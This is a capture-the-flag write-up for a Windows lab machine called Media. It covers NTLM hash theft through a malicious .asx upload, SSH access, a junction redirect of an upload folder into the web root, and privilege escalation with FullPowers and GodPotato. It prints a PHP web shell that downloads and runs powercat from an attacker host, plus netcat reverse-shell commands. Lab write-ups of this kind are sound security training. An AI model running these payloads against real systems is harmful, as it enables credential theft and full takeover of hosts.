Machine (Medium) - Media
Writeup for the Media machine, a medium-level Windows box, which involves stealing NTLM hashes through a media player file, achieving initial access via SSH, and escalating privileges through a symlink attack and impersonation-based exploitation.
Writeup Author: BobBuilder
Objective: Capture NTLM credentials via a malicious upload, gain SSH access, and escalate to SYSTEM via predictable folder creation and impersonation.
| Category | Difficulty | Platform | Machine Author |
|---|---|---|---|
| Machine | Medium | Windows | enox |
User
Step 1: Identify Web Upload Vulnerability
The website running on port 80 includes a form asking for a "brief introduction video (compatible with Windows Media Player)." This can be exploited using a special .asx file to trigger a connection back to an SMB share and leak NTLM hashes.
We generate a malicious .asx file:
python3 ntlm_theft.py --generate all --server <attacker_ip> --filename nt
We then upload the nt.asx file using the video submission form.
Step 2: Capture NTLM Hash with Responder
Using Responder, we receive a valid NTLMv2 hash from user enox. After cracking the hash using john, we retrieve the plaintext password (redacted).
Step 3: SSH Access with Captured Credentials
ssh enox@<media_ip>
We successfully log in and retrieve the user flag from:
C:\Users\enox\Desktop\user.txt
Root
Step 1: Analyze Upload Logic
The main site (index.php) handles form input and uploads files to:
C:\Windows\Tasks\Uploads\<md5(firstname.lastname.email)>\
The script uses md5() on the concatenation of user input to determine the upload folder. This allows us to predict the directory name.
Step 2: Abuse Symlink to Redirect Uploads
We calculate the folder name:
echo -n "firstname.lastname.email" | md5sum
Then we delete the original folder and create a Junction to redirect uploads into the web root:
mklink /J C:\Windows\Tasks\Uploads\<predicted_md5> C:\xampp\htdocs
Once the file is re-uploaded using the form, it appears in the web root and can be accessed and executed.
Step 3: Gain Web Shell
We upload a PHP reverse shell using the upload form:
<?php
system('powershell -c "IEX(New-Object System.Net.WebClient).DownloadString(\'http://<attacker_ip>/powercat.ps1\'); powercat -c <attacker_ip> -p 4444 -e cmd"');
?>
We then trigger the shell by visiting:
http://<media_ip>/shell.php
This gives us a shell as NT AUTHORITY\LOCAL SERVICE.
Step 4: Restore Missing Privileges with FullPowers
The LOCAL SERVICE account is restricted, so we upload and execute FullPowers:
.\FullPowers.exe -c "C:\temp\nc64.exe <attacker_ip> 443 -e cmd" -z
This escalates our shell and grants missing privileges like SeImpersonatePrivilege.
Step 5: Exploit SeImpersonatePrivilege with GodPotato
Using GodPotato, we impersonate a SYSTEM token:
.\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe <attacker_ip> 443"
This spawns a SYSTEM shell.